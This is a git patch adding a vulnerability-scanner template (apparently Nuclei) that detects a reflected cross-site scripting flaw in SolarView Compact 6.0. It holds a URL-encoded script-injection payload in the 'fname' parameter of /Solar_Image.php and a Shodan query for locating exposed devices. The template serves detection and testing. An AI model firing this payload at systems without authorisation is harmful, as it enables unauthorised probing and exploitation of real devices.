From 2253fdcdabca5535fd4cbb229ea9766cdec4a72f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 2 Aug 2022 20:47:11 +0530 Subject: [PATCH] Create solarview-compact-xss.yaml --- .../other/solarview-compact-xss.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 vulnerabilities/other/solarview-compact-xss.yaml diff --git a/vulnerabilities/other/solarview-compact-xss.yaml b/vulnerabilities/other/solarview-compact-xss.yaml new file mode 100644 index 0000000000..1ef86e1575 --- /dev/null +++ b/vulnerabilities/other/solarview-compact-xss.yaml @@ -0,0 +1,33 @@ +id: solarview-compact-xss + +info: + name: SolarView Compact 6.00 - Cross-Site Scripting(XSS) + author: ritikchaddha + severity: medium + description: | + SolarView Compact v6.0 is vulnerable to cross-site scripting (XSS) vulnerability via `fname` at /Solar_Image.php. + metadata: + verified: true + shodan-query: http.html:"SolarView Compact" + tags: xss,solarview + +requests: + - method: GET + path: + - '{{BaseURL}}/Solar_Image.php?mode=resize&fname=test%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'value="test">">' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200